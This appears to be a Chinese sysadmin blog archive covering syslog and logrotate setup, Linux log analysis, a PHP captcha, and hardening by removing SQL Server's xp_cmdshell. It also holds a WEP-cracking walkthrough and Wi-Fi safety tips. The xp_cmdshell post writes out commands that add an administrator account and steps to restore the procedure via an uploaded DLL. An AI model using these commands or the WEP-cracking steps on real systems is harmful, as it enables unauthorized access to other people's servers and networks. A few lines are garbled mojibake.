LOG_SYSLOG——由Syslogd（8）产生的内部消息。
LOG_LOCAL0~LOG_LOCAL7——本地使用保留。
Syslog为每个事件赋予几个不同的优先级：
LOG_EMERG——紧急情况。
LOG_ALERT——应该被立即改正的问题，如系统数据库破坏。
LOG_CRIT——重要情况，如硬盘错误。
LOG_ERR——错误。
LOG_WARNING——警告信息。
LOG_NOTICE——不是错误情况，但是可能需要处理。
LOG_INFO——情报信息。
Syslog.conf文件指明Syslogd程序纪录日志的行为，该程序在启动时查询配置文件。该文件由不同程序或消息分类的单个条目组成，每个占一行。对每类消息提供一个选择域和一个动作域。这些域由Tab隔开：选择域指明消息的类型和优先级；动作域指明Syslogd接收到一个与选择标准相匹配的消息时所执行的动作。每个选项是由设备和优先级组成。当指明一个优先级时，Syslogd将纪录一个拥有相同或更高优先级的消息。所以如果指明“crit”，那所有标为Crit、Alert和Emerg的消息将被纪录。每行的行动域指明当选择域选择了一个给定消息后应该把他发送到哪儿。例如，如果想把所有邮件消息纪录到一个文件中，如下：
#Log all the mail messages in one place mail.* /var/log/maillog
其它设备也有自己的日志，UUCP和News设备能产生许多外部消息。它把这些消息存到自己的日志（/var/log/spooler）中并把级别限为“err”或更高。例如：
# Save mail and news errors of level err and higher in aspecial file.uucp,news.crit /var/log/spooler
当一个紧急消息到来时，可能想让所有的用户都得到。也可能想让自己的日志接收并保存：
#Everybody gets emergency messages， plus log them on anther machine *.emerg * *.emerg @linuxaid.com.cn
Alert消息应该写到ROOT和Tiger的个人账号中：
#ROOT and Tiger get alert and higher messages *.alert ROOT,tiger

小提示：有时Syslogd将产生大量的消息，例如内核（Kern设备）可能很冗长，用户可能想把内核消息纪录到/dev/console中。下面的例子表明内核日志纪录被注释掉了：
#Log all kernel messages to the console
#Logging much else clutters up the screen
#kern.* /dev/console

用户可以在一行中指明所有的设备。下面的例子把Info或更高级别的消息送到/var/log/messages，除了Mail以外。级别“none”禁止一个设备：
#Log anything（except mail）of level info or higher
#Don't log private authentication messages!
*.info:mail.none;authpriv.none /var/log/messages
在有些情况下可以把日志送到打印机，这样网络入侵者怎么修改日志都没有用了。

小提示：有个小命令Logger为Syslog（3）系统日志文件提供一个Shell命令接口，使用户能创建日志文件中的条目。例如：logger This is a test。它将产生一个如下的Syslog纪录：
Aug 19 22:22:34 tiger: This is a test!
所以不要完全相信日志，因为攻击者很容易修改它的。

通过上面对Linux的日志了解，我们就可以更好的实时监测系统状态，监测和追踪侵入者的行踪了！

使用logrotate 管理日志文件

对于Linux 的系统安全来说，日志文件是极其重要的工具。系统管理员可以使用logrotate 程序用来管理系统中的最新的事件。

对于Linux 的系统安全来说，日志文件是极其重要的工具。
系统管理员可以使用logrotate 程序用来管理系统中的最新的事件。logrotate 还可以用来备份日志文件，本篇将通过以下几部分来介绍

日志文件的管理：
1、logrotate 配置
2、缺省配置 logrotate
3、使用include 选项读取其他配置文件
4、使用include 选项覆盖缺省配置
5、为指定的文件配置转储参数

一、logrotate 配置

logrotate 程序是一个日志文件管理工具。用来把旧的日志文件删除，并创建新的日志文件，我们把它叫做“转储”。我们可以根据日志文件的大小，也可以根据其天数来转储，这个过程一般通过 cron 程序来执行。
logrotate 程序还可以用于压缩日志文件，以及发送日志到指定的E-mail 。

logrotate 的配置文件是 /etc/logrotate.conf。主要参数如下表：

参数 功能
compress 通过gzip 压缩转储以后的日志
nocompress 不需要压缩时，用这个参数
copytruncate 用于还在打开中的日志文件，把当前日志备份并截断
nocopytruncate 备份日志文件但是不截断
create mode owner group 转储文件，使用指定的文件模式创建新的日志文件
nocreate 不建立新的日志文件
delaycompress 和 compress 一起使用时，转储的日志文件到下一次转储时才压缩
nodelaycompress 覆盖 delaycompress 选项，转储同时压缩。
errors address 专储时的错误信息发送到指定的Email 地址
ifempty 即使是空文件也转储，这个是 logrotate 的缺省选项。
notifempty 如果是空文件的话，不转储
mail address 把转储的日志文件发送到指定的E-mail 地址
nomail 转储时不发送日志文件
olddir directory 转储后的日志文件放入指定的目录，必须和当前日志文件在同一个文件系统
noolddir 转储后的日志文件和当前日志文件放在同一个目录下
prerotate/endscript 在转储以前需要执行的命令可以放入这个对，这两个关键字必须单独成行
postrotate/endscript 在转储以后需要执行的命令可以放入这个对，这两个关键字必须单独成行
daily 指定转储周期为每天
weekly 指定转储周期为每周
monthly 指定转储周期为每月
rotate count 指定日志文件删除之前转储的次数，0 指没有备份，5 指保留5 个备份
tabootext [+] list 让logrotate 不转储指定扩展名的文件，缺省的扩展名是：.rpm-orig, .rpmsave, v, 和 ~
size size 当日志文件到达指定的大小时才转储，Size 可以指定 bytes (缺省)以及KB (sizek)或者MB (sizem).

二、缺省配置 logrotate

logrotate 缺省的配置募??/etc/logrotate.conf。
Red Hat Linux 缺省安装的文件内容是：

# see "man logrotate" for details
# rotate log files weekly
weekly

# keep 4 weeks worth of backlogs
rotate 4

# send errors to root
errors root
# create new (empty) log files after rotating old ones
create

# uncomment this if you want your log files compressed
#compress
1
# RPM packages drop log rotation information into this directory
include /etc/logrotate.d

# no packages own lastlog or wtmp --we'll rotate them here
/var/log/wtmp {
monthly
create 0664 root utmp
rotate 1
}

/var/log/lastlog {
monthly
rotate 1
}

# system-specific logs may be configured here

缺省的配置一般放在logrotate.conf 文件的最开始处，影响整个系统。在本例中就是前面12行。

第三行weekly 指定所有的日志文件每周转储一次。
第五行 rotate 4 指定转储文件的保留 4份。
第七行 errors root 指定错误信息发送给root。
第九行create 指定 logrotate 自动建立新的日志文件，新的日志文件具有和
原来的文件一样的权限。
第11行 #compress 指定不压缩转储文件，如果需要压缩，去掉注释就可以了。

三、使用include 选项读取其他配置文件
include 选项允许系统管理员把分散到几个文件的转储信息，集中到一个
主要的配置文件。当 logrotate 从logrotate.conf 读到include 选项时，会从指定文件读入配置信息，就好像他们已经在/etc/logrotate.conf 中一样。

第13行 include /etc/logrotate.d 告诉 logrotate 读入存放在/etc/logrotate.d 目录中的日志转储参数，当系统中安装了RPM 软件包时，使用include 选项十分有用。RPM 软件包的日志转储参数一般存放在/etc/logrotate.d 目录。

include 选项十分重要，一些应用把日志转储参数存放在 /etc/logrotate.d 。

典型的应用有：apache, linuxconf, samba, cron 以及syslog。

这样，系统管理员只要管理一个 /etc/logrotate.conf 文件就可以了。

四、使用include 选项覆盖缺省配置

当 /etc/logrotate.conf 读入文件时，include 指定的文件中的转储参数将覆盖缺省的参数，如下例：

# linuxconf 的参数
/var/log/htmlaccess.log
{ errors jim
notifempty
nocompress
weekly
prerotate
/usr/bin/chattr -a /var/log/htmlaccess.log
endscript
postrotate
/usr/bin/chattr +a /var/log/htmlaccess.log
endscript
}
/var/log/netconf.log
{ nocompress
monthly
}

在这个例子中，当 /etc/logrotate.d/linuxconf 文件被读入时，下面的参数将覆盖/etc/logrotate.conf中缺省的参数。

Notifempty
errors jim

五、为指定的文件配置转储参数
经常需要为指定文件配置参数，一个常见的例子就是每月转储/var/log/wtmp。为特定文件而使用的参数格式是：

# 注释
/full/path/to/file
{
option(s)
}

下面的例子就是每月转储 /var/log/wtmp 一次：
#Use logrotate to rotate wtmp
/var/log/wtmp
{
monthly
rotate 1
}

六、其他需要注意的问题

1、尽管花括号的开头可以和其他文本放在同一行上，但是结尾的花括号必须单独成行。

2、使用 prerotate 和 postrotate 选项
下面的例子是典型的脚本 /etc/logrotate.d/syslog，这个脚本只是对
/var/log/messages 有效。

/var/log/messages
{
prerotate
/usr/bin/chattr -a /var/log/messages
endscript
postrotate
/usr/bin/kill -HUP syslogd
/usr/bin/chattr +a /var/log/messages
endscript
}

第一行指定脚本对 /var/log messages 有效
花ê哦阅诓康慕疟驹诵杏? /var/log/messages
prerotate 命令指定转储以前的动作/usr/bin/chattr -a 去掉/var/log/messages文件的“只追加”属性 endscript 结束 prerotate 部分的脚本postrotate 指定转储后的动作

/usr/bin/killall -HUP syslogd

用来重新初始化系统日志守护程序 syslogd

/usr/bin/chattr +a /var/log/messages

重新为 /var/log/messages 文件指定“只追加”属性，这样防治程序员或用户覆盖此文件。

最后的 endscript 用于结束 postrotate 部分的脚本

3、logrotate 的运行分为三步：

判断系统的日志文件，建立转储计划以及参数，通过cron daemon 运行下面的代码是 Red Hat Linux 缺省的crontab 来每天运行logrotate。

#/etc/cron.daily/logrotate
#! /bin/sh

/usr/sbin/logrotate /etc/logrotate.conf

4、/var/log/messages 不能产生的原因：
这种情况很少见，但是如果你把/etc/services 中的 514/UDP 端口关掉的话，这个文件就不能产生了。

小结：本文通过对Red Hat 系统上典型的logrotate 配置例子的介绍，详细说明了logrotate 程序的应用方法。希望对所有Linux 系统管理员有所帮助。管理好，分析好日志文件是系统安全的第一步，在以后的文章里FreeLAMP还会介绍另外一个检查日志的好东东 logcheck。

PS:最近有朋友问一些日志相关的，如何通过日志查入侵迹象的问题，就贴几篇log相关的文档。

理解Linux系统的日志

1. 日志简介

　　日志对于安全来说，非常重要，他记录了系统每天发生的各种各样的事情，你可以通过他来检查错误发生的原因，或者受到攻击时攻击者留下的痕迹。日志主要的功能有：审计和监测。他还可以实时的监测系统状态，监测和追踪侵入者等等。

　　在Linux系统中，有三个主要的日志子系统：

　　连接时间日志--由多个程序执行，把纪录写入到/var/log/wtmp和/var/run/utmp，login等程序更新wtmp和utmp文件，使系统管理员能够跟踪谁在何时登录到系统。

　　进程统计--由系统内核执行。当一个进程终止时，为每个进程往进程统计文件（pacct或acct）中写一个纪录。进程统计的目的是为系统中的基本服务提供命令使用统计。

　　错误日志--由syslogd（8）执行。各种系统守护进程、用户程序和内核通过syslog（3）向文件/var/log/messages报告值得注意的事件。另外有许多UNIX程序创建日志。像HTTP和FTP这样提供网络服务的服务器也保持详细的日志。

　　常用的日志文件如下：

　　access-log 纪录HTTP/web的传输

　　acct/pacct 纪录用户命令

　　aculog 纪录MODEM的活动

　　btmp 纪录失败的纪录

　　lastlog 纪录最近几次成功登录的事件和最后一次不成功的登录

　　messages 从syslog中记录信息（有的链接到syslog文件）

　　sudolog 纪录使用sudo发出的命令

　　sulog 纪录使用su命令的使用

　　syslog 从syslog中记录信息（通常链接到messages文件）

　　utmp 纪录当前登录的每个用户

　　wtmp 一个用户每次登录进入和退出时间的永久纪录

　　xferlog 纪录FTP会话

　　utmp、wtmp和lastlog日志文件是多数重用UNIX日志子系统的关键--保持用户登录进入和退出的纪录。有关当前登录用户的信息记录在文件utmp中；登录进入和退出纪录在文件wtmp中；最后一次登录文件可以用lastlog命令察看。数据交换、关机和重起也记录在wtmp文件中。所有的纪录都包含时间戳。这些文件（lastlog通常不大）在具有大量用户的系统中增长十分迅速。例如wtmp文件可以无限增长，除非定期截取。许多系统以一天或者一周为单位把wtmp配置成循环使用。它通常由cron运行的脚本来修改。这些脚本重新命名并循环使用wtmp文件。通常，wtmp在第一天结束后命名为wtmp.1；第二天后wtmp.1变为wtmp.2等等，直到wtmp.7。

　　每次有一个用户登录时，login程序在文件lastlog中察看用户的UID。如果找到了，则把用户上次登录、退出时间和主机名写到标准输出中，然后login程序在lastlog中纪录新的登录时间。在新的lastlog纪录写入后，utmp文件打开并插入用户的utmp纪录。该纪录一直用到用户登录退出时删除。utmp文件被各种命令文件使用，包括who、w、users和finger。

　　下一步，login程序打开文件wtmp附加用户的utmp纪录。当用户登录退出时，具有更新时间戳的同一utmp纪录附加到文件中。wtmp文件被程序last和ac使用。

　　2. 具体命令

　　wtmp和utmp文件都是二进制文件，他们不能被诸如tail命令剪贴或合并（使用cat命令）。用户需要使用who、w、users、last和ac来使用这两个文件包含的信息。

　　who：who命令查询utmp文件并报告当前登录的每个用户。Who的缺省输出包括用户名、终端类型、登录日期及远程主机。例如：who（回车）显示

chyang pts/0 Aug 18 15:06
ynguo pts/2 Aug 18 15:32
ynguo pts/3 Aug 18 13:55
lewis pts/4 Aug 18 13:35
ynguo pts/7 Aug 18 14:12
ylou pts/8 Aug 18 14:15

　　如果指明了wtmp文件名，则who命令查询所有以前的纪录。命令who /var/log/wtmp将报告自从wtmp文件创建或删改以来的每一次登录。

　　w：w命令查询utmp文件并显示当前系统中每个用户和它所运行的进程信息。例如：w（回车）显示：3:36pm up 1 day, 22:34, 6 users, load average: 0.23, 0.29, 0.27

USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
chyang pts/0 202.38.68.242 3:06pm 2:04 0.08s 0.04s -bash
ynguo pts/2 202.38.79.47 3:32pm 0.00s 0.14s 0.05s w
lewis pts/3 202.38.64.233 1:55pm 30:39 0.27s 0.22s -bash
lewis pts/4 202.38.64.233 1:35pm 6.00s 4.03s 0.01s sh /home/users/
ynguo pts/7 simba.nic.ustc.e 2:12pm 0.00s 0.47s 0.24s telnet mail
ylou pts/8 202.38.64.235 2:15pm 1:09m 0.10s 0.04s -bash

　　users：users用单独的一行打印出当前登录的用户，每个显示的用户名对应一个登录会话。如果一个用户有不止一个登录会话，那他的用户名将显示相同的次数。例如：users（回车）显示：chyang lewis lewis ylou ynguo ynguo

　　last：last命令往回搜索wtmp来显示自从文件第一次创建以来登录过的用户。例如：

chyang pts/9 202.38.68.242 Tue Aug 1 08:34 - 11:23 (02:49)
cfan pts/6 202.38.64.224 Tue Aug 1 08:33 - 08:48 (00:14)
chyang pts/4 202.38.68.242 Tue Aug 1 08:32 - 12:13 (03:40)
lewis pts/3 202.38.64.233 Tue Aug 1 08:06 - 11:09 (03:03)
lewis pts/2 202.38.64.233 Tue Aug 1 07:56 - 11:09 (03:12)

　　如果指明了用户，那么last只报告该用户的近期活动，例如：last ynguo（回车）显示：

ynguo pts/4 simba.nic.ustc.e Fri Aug 4 16:50 - 08:20 (15:30)
ynguo pts/4 simba.nic.ustc.e Thu Aug 3 23:55 - 04:40 (04:44)
ynguo pts/11 simba.nic.ustc.e Thu Aug 3 20:45 - 22:02 (01:16)
ynguo pts/0 simba.nic.ustc.e Thu Aug 3 03:17 - 05:42 (02:25)
ynguo pts/0 simba.nic.ustc.e Wed Aug 2 01:04 - 03:16 1+02:12)
ynguo pts/0 simba.nic.ustc.e Wed Aug 2 00:43 - 00:54 (00:11)
ynguo pts/9 simba.nic.ustc.e Thu Aug 1 20:30 - 21:26 (00:55)

　　ac：ac命令根据当前的/var/log/wtmp文件中的登录进入和退出来报告用户连结的时间（小时），如果不使用标志，则报告总的时间。例如：ac（回车）显示：total 5177.47

　　ac -d（回车）显示每天的总的连结时间

Aug 12 total 261.87
Aug 13 total 351.39
Aug 14 total 396.09
Aug 15 total 462.63
Aug 16 total 270.45
Aug 17 total 104.29
Today total 179.02

　　ac -p （回车）显示每个用户的总的连接时间

ynguo 193.23
yucao 3.35
rong 133.40
hdai 10.52
zjzhu 52.87
zqzhou 13.14
liangliu 24.34
total 5178.24

　　lastlog：lastlog文件在每次有用户登录时被查询。可以使用lastlog命令来检查某特定用户上次登录的时间，并格式化输出上次登录日志/var/log/lastlog的内容。它根据UID排序显示登录名、端口号（tty）和上次登录时间。如果一个用户从未登录过，lastlog显示"**Never logged**。注意需要以root运行该命令，例如：

rong 5 202.38.64.187 Fri Aug 18 15:57:01 +0800 2000
dbb **Never logged in**
xinchen **Never logged in**
pb9511 **Never logged in**
xchen 0 202.38.64.190 Sun Aug 13 10:01:22 +0800 2000

　　另外，可一加一些参数，例如，last -u 102将报告UID为102的用户；last -t 7表示限制上一周的报告。

　　3. 进程统计

　　UNIX可以跟踪每个用户运行的每条命令，如果想知道昨晚弄乱了哪些重要的文件，进程统计子系统可以告诉你。它对还跟踪一个侵入者有帮助。与连接时间日志不同，进程统计子系统缺省不激活，它必须启动。在Linux系统中启动进程统计使用accton命令，必须用root身份来运行。Accton命令的形式accton file，file必须先存在。先使用touch命令来创建pacct文件：touch /var/log/pacct，然后运行accton： accton /var/log/pacct。一旦accton被激活，就可以使用lastcomm命令监测系统中任何时候执行的命令。若要关闭统计，可以使用不带任何参数的accton命令。

　　lastcomm命令报告以前执行的文件。不带参数时，lastcomm命令显示当前统计文件生命周期内纪录的所有命令的有关信息。包括命令名、用户、tty、命令花费的CPU时间和一个时间戳。如果系统有许多用户，输入则可能很长。下面的例子：

crond F root ?? 0.00 secs Sun Aug 20 00:16
promisc_check.s S root ?? 0.04 secs Sun Aug 20 00:16
promisc_check root ?? 0.01 secs Sun Aug 20 00:16
grep root ?? 0.02 secs Sun Aug 20 00:16
tail root ?? 0.01 secs Sun Aug 20 00:16
sh root ?? 0.01 secs Sun Aug 20 00:15
ping S root ?? 0.01 secs Sun Aug 20 00:15
ping6.pl F root ?? 0.01 secs Sun Aug 20 00:15
sh root ?? 0.01 secs Sun Aug 20 00:15
ping S root ?? 0.02 secs Sun Aug 20 00:15
ping6.pl F root ?? 0.02 secs Sun Aug 20 00:15
sh root ?? 0.02 secs Sun Aug 20 00:15
ping S root ?? 0.00 secs Sun Aug 20 00:15
ping6.pl F root ?? 0.01 secs Sun Aug 20 00:15
sh root ?? 0.01 secs Sun Aug 20 00:15
ping S root ?? 0.01 secs Sun Aug 20 00:15
sh root ?? 0.02 secs Sun Aug 20 00:15
ping S root ?? 1.34 secs Sun Aug 20 00:15
locate root ttyp0 1.34 secs Sun Aug 20 00:15
accton S root ttyp0 0.00 secs Sun Aug 20 00:15

　　进程统计的一个问题是pacct文件可能增长的十分迅速。这时需要交互式的或经过cron机制运行sa命令来保持日志数据在系统控制内。sa命令报告、清理并维护进程统计文件。它能把/var/log/pacct中的信息压缩到摘要文件/var/log/savacct和/var/log/usracct中。这些摘要包含按命令名和用户名分类的系统统计数据。sa缺省情况下先读它们，然后读pacct文件，使报告能包含所有的可用信息。sa的输出有下面一些标记项：

　　avio--每次执行的平均I/O操作次数

　　cp--用户和系统时间总和，以分钟计

　　cpu--和cp一样

　　k--内核使用的平均CPU时间，以1k为单位

　　k*sec--CPU存储完整性，以1k-core秒

　　re--实时时间，以分钟计

　　s--系统时间，以分钟计

　　tio--I/O操作的总数

　　u--用户时间，以分钟计

　　例如：

842 173.26re 4.30cp 0avio 358k
2 10.98re 4.06cp 0avio 299k find
9 24.80re 0.05cp 0avio 291k ***other
105 30.44re 0.03cp 0avio 302k ping
104 30.55re 0.03cp 0avio 394k sh
162 0.11re 0.03cp 0avio 413k security.sh*
154 0.03re 0.02cp 0avio 273k ls
56 31.61re 0.02cp 0avio 823k ping6.pl*
2 3.23re 0.02cp 0avio 822k ping6.pl
35 0.02re 0.01cp 0avio 257k md5sum
97 0.02re 0.01cp 0avio 263k initlog
12 0.19re 0.01cp 0avio 399k promisc_check.s
15 0.09re 0.00cp 0avio 288k grep
11 0.08re 0.00cp 0avio 332k awk

　　用户还可以根据用户而不是命令来提供一个摘要报告。例如sa -m显示如下：

885 173.28re 4.31cp 0avk
root 879 173.23re 4.31cp 0avk
alias 3 0.05re 0.00cp 0avk
qmailp 3 0.01re 0.00cp 0avk

　　4. Syslog设备

　　Syslog已被许多日志函数采纳，它用在许多保护措施中--任何程序都可以通过syslog 纪录事件。Syslog可以纪录系统事件，可以写到一个文件或设备中，或给用户发送一个信息。它能纪录本地事件或通过网络纪录另一个主机上的事件。

　　Syslog设备依据两个重要的文件：/etc/syslogd（守护进程）和/etc/syslog.conf配置文件，习惯上，多数syslog信息被写到/var/adm或/var/log目录下的信息文件中（messages.*）。一个典型的syslog纪录包括生成程序的名字和一个文本信息。它还包括一个设备和一个优先级范围（但不在日之中出现）。

　　每个syslog消息被赋予下面的主要设备之一：

　　LOG_AUTH--认证系统：login、su、getty等

　　LOG_AUTHPRIV--同LOG_AUTH，但只登录到所选择的单个用户可读的文件中

　　LOG_CRON--cron守护进程

　　LOG_DAEMON--其他系统守护进程，如routed

　　LOG_FTP--文件传输协议：ftpd、tftpd

　　LOG_KERN--内核产生的消息

　　LOG_LPR--系统打印机缓冲池：lpr、lpd

　　LOG_MAIL--电子邮件系统

　　LOG_NEWS--网络新闻系统

　　LOG_SYSLOG--由syslogd（8）产生的内部消息

　　LOG_USER--随机用户进程产生的消息

　　LOG_UUCP--UUCP子系统

　　LOG_LOCAL0~LOG_LOCAL7--为本地使用保留

　　Syslog为每个事件赋予几个不同的优先级：

　　LOG_EMERG--紧急情况

　　LOG_ALERT--应该被立即改正的问题，如系统数据库破坏

　　LOG_CRIT--重要情况，如硬盘错误

　　LOG_ERR--错误

　　LOG_WARNING--警告信息

　　LOG_NOTICE--不是错误情况，但是可能需要处理

　　LOG_INFO--情报信息

　　LOG_DEBUG--包含情报的信息，通常旨在调试一个程序时使用

　　syslog.conf文件指明syslogd程序纪录日志的行为，该程序在启动时查询配置文件。该文件由不同程序或消息分类的单个条目组成，每个占一行。对每类消息提供一个选择域和一个动作域。这些域由tab隔开：选择域指明消息的类型和优先级；动作域指明syslogd接收到一个与选择标准相匹配的消息时所执行的动作。每个选项是由设备和优先级组成。当指明一个优先级时，syslogd将纪录一个拥有相同或更高优先级的消息。所以如果指明"crit"，那所有标为crit、alert和emerg的消息将被纪录。每行的行动域指明当选择域选择了一个给定消息后应该把他发送到哪儿。例如，如果想把所有邮件消息纪录到一个文件中，如下：

#Log all the mail messages in one place
mail.* /var/log/maillog

　　其他设备也有自己的日志。UUCP和news设备能产生许多外部消息。它把这些消息存到自己的日志（/var/log/spooler）中并把级别限为"err"或更高。例如：

# Save mail and news errors of level err and higher in aspecial file.
uucp,news.crit /var/log/spooler

　　当一个紧急消息到来时，可能想让所有的用户都得到。也可能想让自己的日志接收并保存。

#Everybody gets emergency messages， plus log them on anther machine
*.emerg *
*.emerg @linuxaid.com.cn

　　alert消息应该写到root和tiger的个人账号中：

#Root and Tiger get alert and higher messages
*.alert root,tiger

　　有时syslogd将产生大量的消息。例如内核（"kern"设备）可能很冗长。用户可能想把内核消息纪录到/dev/console中。下面的例子表明内核日志纪录被注释掉了：

#Log all kernel messages to the console
#Logging much else clutters up the screen
#kern.* /dev/console

　　用户可以在一行中指明所有的设备。下面的例子把info或更高级别的消息送到/var/log/messages，除了mail以外。级别"none"禁止一个设备：

#Log anything（except mail）of level info or higher
#Don't log private authentication messages!
*.info:mail.none;authpriv.none /var/log/messages

　　在有些情况下，可以把日志送到打印机，这样网络入侵者怎么修改日志都没有用了。通常要广泛纪录日志。Syslog设备是一个攻击者的显著目标。一个为其他主机维护日志的系统对于防范服务器攻击特别脆弱，因此要特别注意。

　　有个小命令logger为syslog（3）系统日志文件提供一个shell命令接口，使用户能创建日志文件中的条目。用法：logger 例如：logger This is a test！

　　它将产生一个如下的syslog纪录：Aug 19 22:22:34 tiger: This is a test!

　　注意不要完全相信日志，因为攻击者很容易修改它的。

　　5. 程序日志

　　许多程序通过维护日志来反映系统的安全状态。su命令允许用户获得另一个用户的权限，所以它的安全很重要，它的文件为sulog。同样的还有sudolog。另外，想Apache有两个日志：access_log和error_log。

　　6. 其他日志工具

chklastlog
ftp://coast.cs.purdue.edu/pub/tools/unix/chklastlog/
chkwtmp
ftp://coast.cs.purdue.edu/pub/tools/unix/chkwtmp/
dump_lastlog
ftp://coast.cs.purdue.edu/pub/tools/unix/dump_lastlog.Z
spar
ftp://coast.cs.purdue.edu/pub/tools/unix/TAMU/
Swatch
http://www.lomar.org/komar/alek/pres/swatch/cover.html
Zap
ftp://caost.cs.purdue.edu/pub/tools/unix/zap.tar.gz
日志分类方法
http://csrc.nist.gov/nissc/1998/proceedings/paperD1.pdf

留言板加上验证码

留言板发现N多垃圾留言，没办法这个年代就是垃圾多啊。加个验证码吧。
先写个seccode.php：

<?php
                header ("Content-type: image/png");

                session_start();
                if (!session_is_registered("seccode")){
                        session_register("seccode");
                }

                $seccode = rand(1000, 9999);
                $_SESSION['seccode'] = $seccode;

                $im = @imagecreate (48, 20);
                $background_color = imagecolorallocate ($im, 255, 255, 255);

                //设置干扰像素，防止被OCR
                for ($i = 0; $i <= 128; $i++){
                        $point_color = imagecolorallocate ($im, rand(0,255), rand(0,255), rand(0,255));
                        imagesetpixel($im, rand(2,128), rand(2,38), $point_color);
                }

                //逐个画上验证码字符
                for ($i=0; $i<=4; $i++){
                        $text_color = imagecolorallocate ($im, rand(0,255), rand(0,128), rand(0,255));
                        $x = 5 + $i * 10;
                        $y = 4;
                        imagechar ($im, 5, $x, $y, substr($seccode, $i, 1), $text_color);
                }

                //输出PNG图像
                imagepng ($im);
                imagedestroy ($im);

?>

在留言文件addnote.php的php开始部分加入：

session_start();
if(PHP_VERSION < '4.1.0') {
        $_SESSION = &$HTTP_SESSION_VARS;
}

判断输入部分加入：

      elseif($code=="" or $code!=$_SESSION['seccode']) {
        echo "<center>请输入正确的验证码!<BR>"."<a href='javascript:history.back()'>返回</a></center>";
      exit; }

输入部分：

                验证码<input name="code" type="text" style="width:50px;" value=""/>
                <script>
                        function refimg(){
                                var randval = Math.random();
                                document.getElementById("secunum").src="seccode.php?rnum="+randval;
                        }
                </script>
               <img src="seccode.php" id="secunum" onclick="refimg()" style="cursor : pointer;"> &nbsp;&nbsp;&nbsp;<span class="redzi12_px">(如果看不清请点击图片进行更换.)</span>

测试ok，这下世界清净多了。

sql server 2000 删除xp cmdshell存储过程

存储过程是存储在 SQLServer中的预先写好的SQL语句集合，其中危险性最高的扩展存储过程就是xp_cmdshell了，它可以执行操作系统的任何指令，而SA是 Microsoft SQLServer的管理员帐号，拥有最高权限，它可以执行扩展存储过程，并获得返回值，比如执行：

exec master..xp_cmdshell 'net user test 1234 /add'和exec master..xp_cmdshell 'net localgroup administrators test /add'

这样对方的系统就被添加了一个用户名为test，密码为1234，有管理员权限的用户，如图一所示。

删除方法为：

到sql server的查询分析器中，试用存储过程sp_dropextendedproc就可删除xp_cmdshell这个存储过程。

格式为：EXEC sp_dropextendedproc 'xp_cmdshell'

需要时可使用sp_addextendedproc恢复

格式为：EXEC sp_addextendedproc xp_cmdshell,'xplog70.dll'。

彻底删除SQL Server2000的xp_cmdShell扩展存贮过程

一、xp_cmdshell的删除及恢复

1、判断xp_cmdshell是否存在

(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = 'X' AND name ='xp_cmdshell')

返回结果为1就ok

2、恢复xp_cmdshell的方法

删除扩展存储过过程xp_cmdshell的语句

exec sp_dropextendedproc 'xp_cmdshell'

恢复cmdshell的sql语句

exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and

返回结果为1就ok

否则需上传c:\inetput\web\xplog70.dll后

exec master.dbo.sp_addextendedproc 'xp_cmdshell',’c:\inetput\web\xplog70.dll’;--

如果是用以下方法删除

drop procedure sp_addextendedproc
drop procedure sp_oacreate
exec sp_dropextendedproc 'xp_cmdshell'

则可以用以下语句恢复

dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")

这样可以直接恢复，不用去管sp_addextendedproc是不是存在

3.彻底删除xp_cmdshell扩展存储过程

使用上面介绍的删除语句后，在磁盘上找到xplog70.dll这个文件。改名或者删除这个文件。

关于XP_CmdShell的其他信息参加MS文档：http://support.microsoft.com/kb/891984

Intel 3945ABG用OmniPeek 4.1抓包破解WEP

测试目的：破解WEP加密
测试系统：WINXP/SP2
无线网卡：Intel PRO/Wireless 3945ABG
测试软件：Network Stumbler、OmniPeek 4.1和WinAircrack
测试机器：DELL 640M
1.首先还是要先用Network Stumbler软件找出你要破解的信号的频段和AP的MAC地址，就是软件开头那12位值

2.将Intel PRO/Wireless 3945ABG
驱动升级为10.5.1.72 or 10.5.1.75，有装管理软件请先关闭。
Intel PRO/Wireless 3945ABG驱动下载(版本：10.5.1.75 )

3.OmniPeek 4.1软件WildPackets API显示为YES，则说明已正常识别网卡。
Microsoft .NET Framework 2.0 SP2下载
(先安装Microsoft .NET Framework 2.0 然后再装WildPackets OmniPeek Personal 4.1)
WildPackets OmniPeek Personal 4.1下载

4.如果我们只是抓WEP数据包的话，设置一下只允许抓WEP的数据包。按ctrl+M打开过滤器列表中没有“802.11 WEP Data”过滤项，我们可以增加一个“802.11 WEP Data过滤项”点击左上角绿色“十”字。

5.Filter输入802.11 wep data，在protocol filter中选择802.11 wep data并打勾protocol filter。

6.然后我们要设置一下内存缓存大小，General-Buffer size，调整为100M就足够(这步很重要不然要抓很多次包)。

7.802.11设置好信号的频道，在BSSID中输入AP的MAC(为什么只设置AP的MAC地址呢？是这样子的在多个同名SSID的AP的情况下设置SSID没有用的)

8.在“Filters”选项中在“801.11 WEP Data ”打勾，就是只抓801.11 WEP数据包，过渡掉不需要的包。然后点确定。

9.点栏口中右边绿色按钮"start  capture"就开始抓包。

10.抓包的过程不小心给点stop capture,可以按住shift点start  capture就可以接着抓包了。如当次抓不到所达到数据包量时，可以保存数据包供下次一起加载破解。如果抓包结束了点start capture，按ctrl+S保存。

11.然后保存为DMP格式。

12.打开WinAircrack，打开刚刚保存DMP格式文件，可以一起加载几次抓包数据。

13.选择为64位加密，不确定是64位加密可以不选，点确定。

14.选择你要破解的，这里很好选择看后面IVS值最大就可以了。

15.破解出来WEP64位加密。

无线不是舍己为人 网络安防同样重要

在公共地点使用无线的注意事项

对于经常参加现场发布会的新闻工作者和习惯使用公共无线热点的朋友来说，关闭自己系统的“文档和打印共享功能”是十分必要的。因为一般公共热点都是面向所有人免费开放的，并不禁止一个客户端对另一个客户端的访问。

另一方面，我们在公共场所无线上网时也要善于分辨哪些热点是“网络陷阱”。有些黑客会在公共场合设置一个伪装的无线存取设备，来吸引使用者上钩。当伪装的无线设备信号强度非常好时，最容易吸引用户上当受骗。此时，黑客便可等着收取受害者键入的密码，或将病毒码输入受害者计算机中。

选择适当的无线信号覆盖范围

一直以来我们将无线路由器的信号覆盖范围看作是其性能高低的重要标识。其实对于一般家庭用户来说，适当的无线信号覆盖范围将有效的减少网络安全事件的发生。

